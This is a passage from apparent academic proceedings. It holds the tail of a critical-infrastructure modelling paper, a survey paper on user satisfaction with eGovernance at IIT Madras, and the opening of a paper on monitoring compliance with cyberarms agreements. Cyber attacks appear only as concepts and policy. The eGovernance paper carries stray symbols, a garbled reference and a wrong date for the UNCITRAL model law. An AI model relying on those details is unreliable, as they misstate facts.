bring entire communities and their industries and utilities to a grinding halt. Therefore, the ability to
analyse and critique the relational aspects of critical infrastructure systems, together with modelling these
system relationships offers an avenue for assessing critical infrastructure system security, identifying
vulnerabilities and locating inherent weaknesses to system availability and service supply.
The research of Watts (1999b) and its interpretation of the interconnections between systems and the
structure of social networks, presents an interesting approach that could provide insight when applied to
critical infrastructure systems. Although this is not applied here, it represents an opportunity for future
research in this area, particularly in terms of identifying the integral interconnections between systems.
Additionally, this offers the opportunity through the identification of these integral interconnections
between critical infrastructure systems to utilise the Causal Modelling approach to interpret the influential
aspects of relationships between critical infrastructure systems. Causal Loop diagrams offer a flexible
‘soft’ approach to enable an illustrative representation of critical infrastructure system dependency and
interdependency relationships that is worthy of future research.
References
Bentley A. (2006) 'Infrastructure: Critical Mass', CSIRO Solve, No.7.
Callaway S.S. Newman M.E.J. Strogatz S.H. Watts D.J. (2000) 'Network Robustness and Fragility: Percolation on
Random Graphs', Physical Review Letters, Vol.85, pp. 54-68.
Caulfield C.W. & Maj S.P. (2002) 'A Case for System Dynamics', Global Journal of Engineering Education, Vol.6,
No.1, pp. 34.
Checkland P. (2000) 'Soft Systems Methodology: A Thirty Year Retrospective', Systems Research and Behavioural
Science, John Wiley & Sons Ltd, Vol.17, pp. S11-S58.
Christensen C. & Albert R. (2007) 'Using graph Concepts to understand the organisation of complex systems',
International Journal of Bifurcation and Chaos, Vol.17, No.7.
Finnigan J. (2005) 'The Science of Complex Systems', Australian Science, pp. 32-34.
Forrester J.W. (1991) 'System Dynamics and the Lessons of 35 Years', in The Systemic Basis of Policy Making in
the 1990s, De Greene K.B. (ed.).
Forrester J.W. (1994) 'System dynamics, systems thinking, and soft OR', System Dynamics Review, Vol.10, No.2-3,
pp. 245-256.
Forrester J.W. (1995) Counterintuitive Behavior of Social Systems.
Forrester J.W. (1998) Designing the Future, University of Seville, Seville, Spain.
Herder P.M. & Verwater-Lukszo Z. (2006) 'Towards next generation infrastructures: an introduction to the
contributions in this issue', International Journal of Critical Infrastructures, Vol.2, No.2/3, pp. 113-120.
Jensen E. & Brehmer B. (2003) 'Understanding and Control of a Simple Dynamic System', System Dynamics
Review, Vol.19, No.2, pp. 119-137.
Kirkwood C.W. (2005a) “A Modelling Approach”, [online], Arizona State University,
www.public.asu.edu/~kirkwood/sysdyn/SDIntro/ch-2.pdf.
Kirkwood C.W. (2005b) “System Behaviour and Casual Loop Diagrams”, [online], Arizona State University,
www.public.asu.edu/~kirkwood/sysdyn/SDIntro/ch-1.pdf.
Kirkwood C.W. (2005c) “System Dynamics Methods: A Quick Introduction”, [online], Arizona State University,
www.public.asu.edu/~kirkwood/sysdyn/SDIntro/SDIntro.htm.
Luna-Reyes L.F. & Andersen D.L. (2003) 'Collecting and analyzing qualitative data for system dynamics: methods
and models', System Dynamics Review, Vol.19, No.4, pp. 271-296.
Maani K.E. & Cavana R.Y. (2000) Systems Thinking and Modelling. Understanding Change and Complexity,
Prentice Hall, Auckland, NZ.
Newman M.E.J. (2003) 'The Structure and Function of Complex Networks', SIAM (Society for Industrial and Applied
Mathematics) Review, Vol.45, No.2, pp. 167-256.
Newth D. & Ash J. (2005) 'Evolving cascading failure resilience in complex networks', Complexity International,
Vol.11.
209

Graeme Pye and Matthew Warren
North M. Macal C. Thomas W. H. Miller D. Peerenboom J. (2002) 'More Than Just Wires: Applying Complexity
Theory to Communication Network Assurance', in 6th World Multiconference on Systemics, Cybernetics, and
Informatics (SCI 2002), Orlando FL USA.
Parrott L. & Kok R. (2000) 'Incorporating Complexity in Ecosystem Modelling', Complexity International, Vol.7.
Schaffernicht M. (2006) 'Detecting and Monitoring Change in Models', System Dynamics Review, Vol.22, No.1, pp.
73-88.
SDS (2006) “What is System Dynamics, System Dynamic Society”, [online], University of Albany, State University of
New York, www.albany.edu/cpr/sds/.
Senge P.M. (1990) The fifth discipline: the art and practice of the learning organisation, Random House Australia,
Milsons Point, NSW.
Stacey R.D. (1996) Strategic management & organisational dynamics, 2nd Edition, Pitman Publishing, London, UK.
Strogatz S.H. (2001) 'Exploring Complex Networks', Nature, Vol.410, pp. 268-276.
Warren K. (2005) 'Improving Strategic Management with the Fundamental Principles of System Dynamics', System
Dynamics Review, Vol.21, No.4, pp. 329-350.
Watts D.J. (1999a) 'Networks, Dynamics, and Small-World Phenomenon', The American Journal of Sociology,
Vol.105, No.2, pp. 493-527.
Watts D.J. (1999b) Small Worlds: The Dynamics of Networks between Order and Randomness, Princeton University
Press, Princeton, NJ, USA.
Watts D.J. (2000) “A simple model of fads and cascading failures” [online]
www.santafe.edu/research/publications/workingpapers/00-12-062.pdf.
Watts D.J. (2004) 'The "New" Science of Networks', Annual Review of Sociology, Vol.30, pp. 243-270.
210

A Study on Cyber Secured eGovernance in an Educational
Institute: Performance and User Satisfaction
Kasi Raju
IIT Madras, Chennai, India
kasiraju@cse.iitm.ac.in
Abstract: It is widely acknowledged that eGovernance can be immensely useful in the efficiency of the functioning of
the government and improving citizen service delivery. There are many areas of concern where the performance of
eGovernance can be improved. A centralized security management system is installed for the secured access of the
eGovernance service. The eGovernance approach will enable governments to achieve efficiency gains and improve
service delivery levels, raise citizen satisfaction with government services, and enhance quality of life of citizens. This
study attempts to find the performance and user satisfaction with eGovernance implemented in an educational
institute. Further, the concentration of the analysis is to find what other areas can be brought under the eGovernance
system. Studies have been made about the existing security measures deployed. From these studies, it was found
that only computer science department students were aware of cyber crime and cyber security. Avoiding paperwork,
24x7 access and transparency were pointed out as advantages in the eGovernance system. Many respondents
expressed concern about the security of their information both in transit and as well as in the databases of the
eGovernance information servers. The aim of this study is to find the performance expectancy and evaluate user
satisfaction in an eGovernance system and to provide secured eGovernance services by hardening the cyber
infrastructures.
Keywords: eGovernance, cyber crime, cyber warfare, cyber security, stuxnet, DDOS, BAR,DCC,stratagem
1. Introduction
UNESCO defines eGovernance as ‘the public sector’s use of information and communication
technologies with the aim of improving information and service delivery, encouraging citizen participation
in the decision-making process and making the government more accountable, transparent and
effective’. While Governance refers to ‘the exercise of political, economic and administrative authority in
the management of a country’s affairs, including citizens’ articulation of their interests and exercise of
their legal rights and obligations’, EGovernance may be understood ‘as the performance of this
governance via the electronic medium in order to facilitate an efficient, speedy and transparent process of
disseminating information to the public, and other agencies, and for performing government
administration activities’. *
2. Literature review of eGovernance
eGovernance evaluation: The theoretical progression of eGovernment in any country or state is along
four stages, which indicate the extent of benefits that the stake holders get through the eGovernment
projects prevalent in that country or state. These are represented schematically in the following figure.
Figure 1: eGovernance evaluation (source: J.Satyanarayana, EGovernment: The Science of Possible,
Prentice-Hall of India Private Limited, p.20) #
211

3. eGovernment stages @
Kasi Raju
This section presents a summary of different stage-models to eGovernment evolution. It is important to
clarify that in reality these stages are not necessarily mutually exclusive or progressive
Initial Presence
This happens when a country, state, or local government has a formal presence on the Internet through a
limited number of individual governmental pages (mostly developed by single governmental agencies).
Governments in this stage normally offer static information about agencies and some of the services they
provide to citizens and private organizations.
Extended Presence
In this stage, governments provide more dynamic, specialized information that is distributed and regularly
updated in a great number of government sites. Sometimes a national government’s official site serves
as an entry point with links to pages of other branches of government, ministries, secretariats,
departments, and sub-national administrative bodies. Some governments might start using electronic
mail or search engines to interact with citizens, businesses and other stakeholders.
Interactive Presence
Governments use a state-wide or national portal as the initial page providing access to services in
multiple agencies. The interaction between citizens and different government agencies increases in this
stage (e.g., eMail, forums, etc.). Citizens and businesses can access information according to their
different interests. In some cases, passwords are used to access more customized and secure services.
Transactional Presence
Citizens and businesses can personalize or customize a national or statewide portal. This portal becomes
a unique showcase of all the governmental services available in the relevant area of interest. The needs
of different constituencies are the main criteria for portal design and access (government structure and
functions are only secondary criteria). The portal allows secure electronic payments to be made,
facilitating transactions such as tax, fines, and services payments.
Vertical Integration
This stage encompasses the integration of similar services provided by different levels of government.
This integration can be virtual, physical, or both. Therefore, this stage does not refer solely to an incipient
integration in the form of government websites, but to the change and reconstruction of the processes
and/or governmental structure.
Horizontal Integration
Horizontal integration between different governmental services must exist for citizens and other
stakeholders to have access to all the potential of information technologies in government. Therefore, in
this stage governments need to cross organizational boundaries and develop a comprehensive and
integral vision of the government as a whole. Vertical and horizontal integration do not necessarily
happen together or sequentially.
Totally Integrated Presence
This stage refers to the situation in which government services are fully integrated (vertically and
horizontally). Citizens have access to a variety of services through a single portal, using a unique ID and
password. All services can be accessed from the same web page and can be paid in a consolidated bill.
A transformation unseen by the public has taken place, and now services are organized according to
processes and constituencies, not only virtually, but also physically. In this stage, governments undertake
institutional and administrative reforms that fully employ the potential of information technologies.
212

4. Types of interactions in eGovernance
Kasi Raju
eGovernance facilitates interaction between different stake holders in governance.
These interactions may be described as follows:
G2G(Government to Government) – In this case, Information and communications Technology is used
not only to restructure the governmental processes involved in the functioning of government entities but
also to increase the flow of information and services within and between different entities. This kind of
interaction is only within the sphere of government and can be both horizontal, i.e. between different
government agencies as well as between different functional areas within an organization, and vertical,
i.e. between national, provincial and local government agencies as well as between different levels within
an organization. The primary objective is to increase efficiency, performance and output.
G2C (Government to Citizens) – In this case, an interface is created between the government and
citizens which enables the citizens to benefit from efficient delivery of a large range of public services.
This expands the availability and accessibility of public services on the one hand and improves the quality
of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24
hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended
kiosk or from one’s home/workplace) and how to interact with the government (e.g. through internet, fax,
telephone, email, face-to-face, etc). The primary purpose is to make the government citizen-friendly.
G2B services: G2B include e-procurement, an online government-supplier exchange for the purchase of
goods and services by government. Typically, e-procurement Web sites allow qualified and registered
users to look for buyers or sellers of goods and services. Depending on the approach, buyers or sellers
may specify prices or invite bids. E-Procurement makes the bidding process transparent and enables
smaller businesses to bid for big government procurement projects. The system also helps the
government generate bigger savings, as costs from middlemen are shaved off and purchasing agents’
overhead is reduced.
G2E (Government to Employees) – Government is by far the biggest employer and like any
organisation, it has to interact with its employees on a regular basis. This interaction is a two-way process
between the organisation and the employee. Use of ICT tools helps in making these interactions fast and
efficient on the one hand and increase satisfaction levels of employees on the other.
5. Benefits of eGovernment
Provision of Services-Electronic Service delivery (ESD). #
The most visible impact of eGovernment is seen in the extent that eGovernment is identified with
provision of electronic services. Electronic Service Delivery (ESD) is beneficial to the citizens and other
customers of the government in a variety of ways.
The following benefits are discussed.
Better image: Speed, efficiency, transparency and convenience arising out of ESD enhance the
image of government.
Cost Cutting: EGovernment can result in significant cost reduction.
Better targeting of benefits: EGovernment projects in the social sectors, especially in the areas of
welfare, health and education in the context of developing countries, bring in benefits arising out of
better targeting of benefit schemes.
eGovernment Benefits to Citizens.
Besides cost reduction, the other benefits to citizens are as follows:
Increased transparency leading to reduced corruption.
Better quality of life as a result of the use of e-services in areas such as health, education,
employment, welfare and finance.
Easy access to information on government agencies and programmes.
Multiple delivery channels to choose from, thus adding to convenience and
213

Kasi Raju
Facilities like single-window and single-sign-on that removes the complexities of visiting multiple
government agencies or web sites.
6. eGovernment and cyber law
Cyber law is the generic name given to the laws governing the acts that happen and exist in the
intangible digital world. The cyber laws govern aspects such as giving a legal status to the intangible
information that exists in cyberspace, the security and privacy of such information, the relationships and
contracts between persons who exchange such information, their rights and responsibilities, crimes
relating to damages caused to cyber information and digital assets and all such matters related to the
digital world. Citizens should be made aware of all the aspects of cyber crime, cyber security and cyber
laws so that they are sure of their information security, and to protect themselves in the courts in case
they are affected by cyber crimes.
Relevance of 36 Stratagems (art of war, written about 1000 years ago) used in ancient China and
the present day “Cyber Warfare”. Cyber Warfare disrupts the eGovernance service.
There are six chapters containing six stratagems each and totalling thirty-six stratagems. $$
They are:1.Winning Stratagems, 2. Enemy Dealing Stratagems, 3. Attacking Stratagems, &&
4. Chaos Stratagems, 5. Proximate Stratagems, 6. Defeat Stratagems
Stratagem #3. “Killing with a borrowed knife” advises “Attack using the strength of another” apply to the
use of “botnets as a means to launch DDOS(Distributed Denial of Service) attack. **
Stratagem #8: “Openly repair the gallery roads, but sneak through the passage of Chencang” means
“Deceive the enemy with an obvious approach that will take a very long time” which applies to the use of
“Backdoors or Trojan worms when attacking a network”.
Stratagem #10: “hide the knife behind a smile” means “Charm and ingratiate yourself with your enemy
until you have gained his trust. Then move against him.” which applies to “Phishing schemes or other
social engineering attacks.”
Stratagem #30: “Send your enemy beautiful women” means “the honey trap” which applies to the use of
“a honey pot, which lures visitors to a rigged site that collects information about them.”
Cyber Law
The IT Act 2000 is the “Cyber Law” of India which came into effect in October 2000. It has been enacted
on the lines of the Model Law on Electronic Commerce adopted by the United Nations Commission on
International Trade Law (UNCITRAL) in 1977.
The Act defines terms such as e-form, e-Gazette, e-record, digital signature, digital signature certificate,
key pair which play pivotal roles in different areas of eGovernment and e-commerce. !!
Scope of eGovernance study
While eGovernment encompasses a wide range of activities, this study concentrates on
1. How effective are the online facilities like course information, forms downloading, institute Circulars
and Announcements, Mess registration system, fees payment, Blood bank.
To find the responses about the advantages like 24x7 access. Time saving, transparency, user
participation in decision making and avoiding paper work.
2. Introducing other areas in eGovernance system like Medical history of patients in IITM hospital,
issue of passes for film club members, housing allocation, travel approval.
Objective
To determine the extent to which usage of the EGovernance system at IIT Madras is effective and to find
the performance and user satisfaction and to explore further avenues for eGovernance.
214

Methodology
Kasi Raju
Survey method is used by providing questionnaires to the faculty, scholars, students and staff. Sample
size of this study is 75. Convenient sample method is used. Data is encoded from the questionnaires for
statistical analysis. Statistical tools like Chi-Square Test and Frequency analysis were used by applying
SPSS (Statistical Package for Social Sciences – version 15).
Analysis
Table 1: Frequency analysis of online facilities used in IITM
No. of
Not Used /
Facilities Used
respondents Percentage Not Responded Percentage
Online facilities 75 100 0 0
Course Information 67 89 8 11
Forms Downloading 58 77 23 23
Project Status 21 28 54 72
Online Course
Development 21 28 54 72
Online Course Regn 41 55 34 45
Books Reservation 32 43 43 57
Books Issue 35 47 40 53
JEE/GATE-Centre 21 28 54 72
Estate Complaints 12 16 63 84
IITM Web Deve 21 28 54 72
Inst.Circ. & Anns. 50 67 25 33
Mess Registration 37 49 38 51
Blood Bank 6 8 69 92
Fees Payment 14 19 61 81
Faculty/Stud. Detail 61 81 14 19
Online Appln. Sub. 20 27 55 73
IITM Mast. Plan survey 10 13 64 85
ICSR Perf. Survey 8 11 67 89
Acad. Perf.Survey 5 7 70 93
CC Perf. Survey 6 8 69 92
Rate Contract 21 28 54 72
Salary Information 23 31 52 69
Using frequency analysis, the number of respondents who have used online facilities in IITM was
calculated. It was found that one hundred percent of respondents have used online facilities.
The respondents for viewing faculty/staff/student details is the highest and next comes those who are on
forms downloading and next are those viewing institute circulars and announcements. The number of
respondents who access blood bank facilities and Computer Centre performance are equal.
The graph Figure 3 shows the respondents, who include faculty, staff, student and scholars, for
innovative features of online facilities at IITM. The most innovative feature is the Mess Registration and
the next one is online courses.
215

Figure 2: Usage of online facilities at IITM
Kasi Raju
Figure 3: Innovative features of online facilities at IITM
The following table and the figure depicts that time saving is considered as the most important advantage
among all.
Table 2: Advantages of eGovernance as quoted by respondents
Advantages Number of Respondents (yes)
24*7 Access 61
Time Saving 67
Transparency 45
User Participation in decision making 33
Avoiding paper work 64
216

Kasi Raju
Figure 4: Advantages of eGovernance as quoted by respondents
Hospital-Patient-History item is the most preferred one for the online facility to be introduced in
the future and the next items are film club and travel approval.
Table 3: Suggestion for online facilities to be introduced in future
Areas of online facilities to be introduced Number of Respondents(yes)
Voting on Academic(BAR, BAC, DCC) 38
Agenda(BAR, BAC, DCC) 27
Gymkhana issues 34
Film Club 47
PCF Report 18
Pension plan statement 23
Travel Approval 45
House Allocation 43
Hospital patient history 64
217

Kasi Raju
Figure 5: Suggestion for online facilities to be introduced in future
BAR: Board of Academic Research, BAC: Board of Academic Courses
DCC:Department Consultative Committee, PCF: Personal Contingency Fund
Table 4: Chi-Square test is significant and implies that the different kinds of innovative features role wise
innovation
Innovation Faculty Staff Scholar Student Total
Course Information 1 1 5 2 9
Inst.Circulars & Announcements 2 1 2 0 5
Mess Registration System 0 0 12 8 20
Blood Bank 0 0 0 2 2
Faculty & Student details 2 1 0 2 5
Online Application submission 0 2 0 1 3
Computer Centre Performance 0 0 1 0 1
Details of rate contract 0 5 0 0 5
Salary information 0 2 0 0 2
Project / Fund status 1 0 0 0 1
Online Course development 3 1 0 0 4
Online Course registration 0 0 0 4 4
Books reservation & Journal reference 0 0 4 0 4
Computerization of Catalogue(library) 0 1 3 3 7
JEE/GATE-Centre representative 3 0 0 0 3
Total 12 14 27 22 75
218

Kasi Raju
Among all innovative features, mess registration system was the most innovative. The second one is
Course Information.
7. The Summary of findings
Hundred percent of the respondents have used the online facilities.
In the online facilities category, online course registration, viewing faculty, student and staff
information, viewing Institute circulars and Announcements, Forms down loading and viewing Salary
information are preferred most by the respondents.
In the most innovative category, Mess registration and online course registration were opted as most
innovative items.
Time saving, Avoiding paper work, 24x7 access and transparency were considered as the most
advantages in the EGovernance system.
Areas to be introduced in future online system.
Hospital: Medical history of faculty, students and staff, Travel approval and statement, Film club issue of
passes, voting on academic(BAR,BAC and DCC) and Gymkhana issue of passes were recommended by
the respondents.
8. Conclusion
Apart from the above mentioned findings, many respondents expressed their concern for the security of
the information both in transit through internet and as well as in the databases. It was felt by some
respondents that the online facilities are not user friendly. Our system implements secured eGovernance
services using cryptographic protocols and primitives.
Future work and Suggestions: Survey on effective utilization of “eGovernance Portals” using ICT
(information and communication technology) infrastructure. I am planning to conduct a survey on how
effectively the eGovernance information system is being used by the village people of Tamil Nadu. Due to
the lack of computer facilities, people from villages could not access the web portal of the Tamil Nadu
Government, in India. Therefore, I propose the new idea of collecting the data from the NIC (National
Informatics Centre) centre server's log file which contains district wise access of the people of Tamil
Nadu. The process of collecting information from this log file, drawing relevant graphs and web-enabling
can be automated by “cron” process available in the “Unix Operating System” web servers. Based on this
information system, government can concentrate more in the villages of the districts which have not
benefited from the eGovernance system. The following figures depict the innovative ideas about the new
method of data collection using ICTs. The two figures Figure 6a and 6b explain the future tasks: the
district wise data collection and the relevant graphs.
Figure 6a: Future plan to collect data and web enabling
219

Kasi Raju
Figure 6b: Future plan to collect data and web enabling
References
http://portal.unesco.org/ci/en/ev.php-URL_ID=2179&URL_DO=DO_TOPIC&URL_SECTION=201.html
http://en.wikipedia.org/wiki/Thirty-Six_Stratagems#Thirty-Six_Stratagems
Carr, Jeffrey Pub: O’Reilly && Book: “Inside Cyber Warfare”
Satyanarayana, J. pub: Prentice Hall of India. P;20 pub: Prentice Hall of India. P;20# book: “eGovernment: The
Science of possible”
www.umass.edu/digitalcenter/research/working_papers/05_001gilgarcia.pdf
Vivekanandan, V. C Associate Professor, NALSAR Proximate University.!! Cyber Crimes, Author :
220

Steps towards Monitoring Cyberarms Compliance
Neil Rowe 1 , Simson Garfinkel 1 , Robert Beverly 1 , and Panayotis Yannakogeorgos 2
1 U.S. Naval Postgraduate School, Monterey, USA
2 Air Force Research Institute, Maxwell AFB, USA
ncrowe at nps dot edu
slgarfin at nps dot edu
rbeverly at nps dot edu
yannakog1 at gmail dot com
Abstract: Cyberweapons are difficult weapons to control and police. Nonetheless, technology is becoming available
that can help. We propose here the underlying technology necessary to support cyberarms agreements.
Cyberweapons usage can be distinguished from other malicious Internet traffic in that they are aimed precisely at
targets which we can often predict in advance and can monitor. Unlike cybercriminals, cyberweapons use will have
political goals, and thus attackers will likely not try hard to conceal themselves. Furthermore, cyberweapons are
temperamental weapons that depend on flaws in software, and flaws can get fixed. This means that cyberweapons
testing will be seen before a serious attack. As well, we may be able to find evidence of cyberweapons on
computers seized during or after hostilities since cyberweapons have important differences from other software and
are difficult to conceal on their development platforms. Recent advances in quick methods for assessing the
contents of a disk drive can be used to rule out irrelevant data quickly. We also discuss methods for making
cyberweapons more responsible by attribution and reversibility, and we discuss the kinds of international agreements
we need to control them.
Keywords: cyberweapons, cyberattacks, agreements, monitoring, forensics, reversibility
1. Introduction
Cyberweapons are software that can be used to achieve military objectives by disabling computer
systems, networks, or key functions of them. They can be malicious software installed secretly through
concealed downloads or deliberate plants by human agents, or they can be attempts to overload online
services. Cyberweapons are a growing component in military arsenals (Libicki 2007). Increasingly
countries are instituting "cyberattack corps" with capabilities to launch attacks in cyberspace on other
countries as an instrument of war, either alone or combined with attacks by conventional military forces
(Clarke and Knake 2010). Cyberattacks seem appealing to many military commanders in comparison to
conventional arms. They seem to require fewer resources to mount since their delivery can be
accomplished in small payloads such as malicious devices or packets. They also seem "cleaner" than
conventional weapons in that their damage is primarily to data and data can be repaired, although they
are they are difficult to control and often perform actions close to perfidy, outlawed by the laws of war
(Rowe 2010 JTE). Cyberweapons can be developed with modest technological infrastructure, even by
underdeveloped countries (Gady 2010) taking advantages of international resources. So there is a
particular threat of cyberattacks from "rogue states" such as North Korea and terrorist groups that hold
extreme points of view.
Many of the information-security tools we use to control threats and vulnerabilities with the common
criminal cyberattacks (Brenner 2010) will aid against the cyberweapon threat. Good software
engineering practices, access controls, and system and network monitoring all help. But they are
insufficient to stop cyberattacks today because of the increasing numbers of cyberattacks and the
inherent weaknesses of these countermeasures. State-sponsored cyberattacks will be even harder to
stop because they can exploit significant resources and could be more sophisticated than the attacks
common today. They will likely employ a variety of methods simultaneously to have a high probability of
success, and they can be tested thoroughly under a range of circumstances. Most current defensive
measures will probably be useless against them.
2. Approach
What can be done against such threats? We believe that countries must negotiate international
agreements similar to those for nuclear, chemical, and biological weapons. Such agreements (treaties,
conventions, protocols, and memoranda of understanding) (Croft 1996) can dictate the ways in which
cyberweapons can be used, as for instance stipulating that countries agree to use cyberweapons only in
defense to a cyberattack or in a serious crisis. Agreements can require action against hacker groups
within a country as part of that country's internal policing so that a nation cannot shift blame for
cyberattacks and cyberweapons onto them. Very little has been done in proposing such agreements to
221

Neil Rowe et al.
date. It is time to plan out what such agreements will entail and how they should be enforced. The
EastWest Institute in the U.S. recently proposed a cyberwar "Geneva Convention" (Rooney 2011).
(Johnson 2002) was skeptical in 2002 of the ability to implement cyberarms control, citing the difficulty of
monitoring compliance. But the evolution of attacks since 2002 undermines many of his arguments.
Cyberweapons are no longer a "cottage industry" but require significant infrastructure for finding exploits,
finding targets, gaining access, managing the attacks, and concealing the attacks, and this infrastructure
leaves traces. This is because target software, systems, and networks are becoming increasingly
hardened and complex, and attacking them is becoming harder; and also because vulnerabilities are
being found and fixed faster than ever. Also, digital forensics has advanced significantly since 2002,
making it possible to determine all kinds of things from analysis of disk drives. Some technologies central
for criminal cyberattacks today like code obfuscation have little legitimate use and are good indicators of
cyberattack development, and we expect that the technologies used by cyberweapons will be similar.
Thus we think international agreements on cyberweapons are worth the effort even though finding
cyberweapons and observing their use is hard. The situation is similar to that with chemical weapons for
which there are, for example, many methods for making mustard gas that can use common chemicals
with legitimate uses. Although proving that a facility is used for chemical or biological weapons
production is difficult, the type of equipment at a facility can give a good probability that it has been used
to manufacture such weapons, as U.N. inspectors realized in Iraq in the 1990s when they discovered
evidence of airlocks in alleged food-production facilities. International conventions banning chemical and
biological weapons having been effective despite the difficulties of verifying production and stockpiling of
such weapons (Price 1997). We think that similar examinations, and therefore conventions, should be
possible in the cyberdomain. Even if developers of cyberweapons delete or hide evidence on their disks,
there are many ways to retrieve it (Garfinkel 2006). We should start researching now how to perform
effective cyberinspections.
We realize that policy is too often driven by crises, so it may take a serious cyberattack to interest a
country in negotiating cyberarms limitations. Such a cyberattack is technically feasible (Clarke and
Knake 2010) and could happen at any time. We need to be ready with proposals if it happens. In the
meantime, progress can be made by the United Nations in negotiating broad cyberarms agreements.
Such agreements could be helpful when rogue countries such as North Korea and terrorist organizations
threaten the development of cyberwarfare capabilities and broad international cooperation is possible.
Two recent cases provide motivation. One is the cyberattacks on Georgia in August 2008 discussed in
(Rowe 2010 ECIW). These were denial-of-service attacks against predominantly Georgian government
Web sites. They were effective but there was collateral damage from the imprecision of the attack.
Evidence suggests that private interests in Russia were responsible for the attacks (USCCU 2009). The
other case is the "Stuxnet" worm and corresponding exploits targeting SCADA systems (Markoff 2010).
These used traditional malware methods for modifying programs. Since Stuxnet targeted industrial
systems with no associated financial incentive, it was clearly developed by an information-warfare group
of a nation-state. It appears that Stuxnet was discovered because it spread well beyond its intended
target. Nevertheless, in November 2010 it was reported that Stuxnet may have been successful in
destroying multiple uranium processing centrifuges that are part of the Iranian nuclear effort.
3. Details
To achieve international agreements on cyberweapons, we see four issues: (1) locating them on
computers; (2) noticing their use; (3) encouraging the more responsible kinds of cyberweapons; and (4)
choosing appropriate types of agreements.
3.1 Analysis of drives to find cyberweapons
The U.S. analyzed a number of captured computers and devices in its recent military operations in Iraq
and Afghanistan. This was useful in identifying insurgent networks and their interconnections. Similarly,
we believe that a good deal can be learned about a country's cyberweapons from the computers used to
develop or deploy them. As part of a negotiated settlement of a conflict, a country may agree to forego
cyberweapons, and may agree to submit to periodic inspections to confirm this (United Nations 1991).
Detection of cyberweapons might seem difficult. But there are precedents in the detection of nuclear,
chemical, and biological weapons (O'Neill 2010). Cyberweapons development generally requires
222

Neil Rowe et al.
unusual computer usage in secret facilities since most cyberweapons require secrecy to be effective,
which rules out most software development facilities. Clues to cyberweapons can also be found inside
computers. Certain types of software technology such as code obfuscation and spamming aids are good
clues to malicious intent. Code for known attacks (for providing reuse opportunities) and stolen
proprietary code such as Windows source code (for testing attacks) are other good clues. Technologies
such systematic code testers, "fuzzing" utilities, and code for remote control of other computers provide
supporting evidence of cyberweapons development though they have some legitimate uses. Data alone
can be a clue, such as detailed reconnaissance information on adversary computer networks. Diversity
of software techniques is a clue to cyberweapons development because the unreliability of cyberweapons
requires use of multiple methods as backup. Once suspected cyberweapons are found, they can be
studied systematically to confirm their nature using malware analysis (Malin, Casey, and Aquilina 2008).
A cyberweapon inspection regime would have to be performed on-site and with automated tools, as a
party to a cybermonitoring regime would not allow a potential adversary to remove materials from a
secret facility. Cyberweapon monitors would likely be required to use bootable CD-ROMs that would
contain programs to analyze the contents of a computer system and look for evidence of cyberweapon
development. Inspection would require a scheme for management of the necessary passwords and keys
for the systems inspected, which could be aided by key escrow methods. Inspection regimes should also
require "write-blockers" to assure that the monitors did not themselves plant cyberweapons on the
systems being monitored. Other useful ideas from monitoring of nuclear capabilities (O'Neill 2010)
include agreed inspector entry into the inspected country within a time limit, allowed banning of certain
inspectors, designation of off-limits areas, and limits on what kind of evidence can be collected.
A good prototype of what can be done in analysis of drives is our work on the Real Data Corpus, our
collection of drive images (mostly disks) collected from around the world. Currently this collection
includes more than 2000 disk images. Recent work has characterized disks and drives as a whole,
including understanding of the type of user and the type of usages (Rowe and Garfinkel 2010). Clusters
of files that have no counterpart in others in a corpus are particularly interesting, and can be the focus of
more detailed forensic analysis. For faster assessment, random sampling of fragments taken from the
middle of a file can accurately identify different types of data (Garfinkel et al. 2010). Tools for detecting
deception markers are also useful since illegal cyberweapons development would need to be concealed.
Deception could be in the form of deleted, renamed, or encrypted files, and could be enhanced by other
techniques such as changing the system clock or manipulating a log file.
3.2 Network monitoring for cyberweapons
There are many tools to discriminate legitimate from abusive network traffic. Such inferential intrusion
detection has limitations due to the difficulty of defining malicious traffic in a sufficiently general way
without incurring a large number of false positives (Trost, 2010). But the attack landscape is different for
politically and economically motivated state-sponsored cyberattacks:
Targets: State-sponsored attacks will be targeted to particular regions and political agendas, in
contrast to most criminals, who target victims indiscriminately.
Sophistication: Cyberarms will be the product of well-funded nations with significant resources.
Thus they will use new and sophisticated techniques rather than the common simpleminded attacks
we see on the Internet. That may mean their initial stages may be hard to detect. However, as with
all weapons, they must eventually produce a significant effect, and at that point their use will be
obvious.
Attribution: As with conventional warfare, the warring parties will likely follow specified (nondigital)
protocols. Protocols will likely dictate that combatants reveal who they are at least in general terms.
These features mean that there will be clues to cyberweapons use in the nature of the targets, the
sophistication and effectiveness of the attack, and the ability to attribute them. We can use conventional
network monitoring to detect significant attacks; for instance, the denial of service in the Georgia attacks
was easy to recognize. This does require a sufficiently broad deployment of network-traffic vantage
points, secured both physically and virtually from tampering. One approach to deploying them is to have
the vantage points be entirely passive and communicate over separate infrastructure via encrypted and
authenticated channels. Centralization is an issue in the monitoring; the United Nations would probably
want a centralized approach if they are to monitor. Ideally, a vantage point should exist at the ingress to
each important network of a country, capable of full-rate traffic processing. If this is difficult, random
223

Neil Rowe et al.
sampling of traffic can be done. The monitoring infrastructure could be realized via government mandate
or as part of efforts to enable wiretap compliance.
Whereas the targeting of a criminal attack is often widespread and indiscriminate to obtain maximum
victimization rates and profit to the criminal (although there are exceptions for some sophisticated
financial scams), cyberweapons are likely to be much more focused. A cyberweapon might attack a
particular country, a type of service (e.g. electrical grid or water systems), or systems used by a certain
political, ethnic or religious persuasion. Both the Georgia and Stuxnet attacks employed moderately
focused targeting (insufficiently focused according to critics). However, potential vulnerabilities and
attack vectors will not correlate much with targets and there must be significant testing. This complicates
the job of the attacker and requires additional tools beyond those used in purely criminal endeavors. We
can use this difference to our advantage in detecting cyberweapons development. Cyberweapons by
their nature are complex pieces of software that include components for penetrating remote systems,
controlling the remote systems, and propagating to other systems. Understanding the behavior of a
cyberweapon in isolation, or in simulated environments is difficult – the more secret the testing, the less
like the real world it will be, and the less accurate it will be at predicting real-world performance. We can
see this demonstrated in the poor initial performance of complex new conventional weapons systems
such as aircraft. We expect that countries wishing to employ cyberweapons will first unobtrusively try
them against real targets to understand their real-world efficacy. An example is the attacks on Estonia in
2007 prior to the attacks on Georgia in 2008. The breadth of the initial testing provides a clue to
forthcoming cyberweapons use.
Thus, detecting pre-hostility events at the network level is possible. It can be aided by metrics for
detecting national or political bias in the targets of malicious network traffic. Standard statistical
techniques can suggest that the victims represent a particular political perspective or country's interest
more than a random sample would (Rowe and Goh 2007). For instance, a significance test on a linear
metric encoding political or social agendas can provide a first approximation, while the Kullback-Leibler
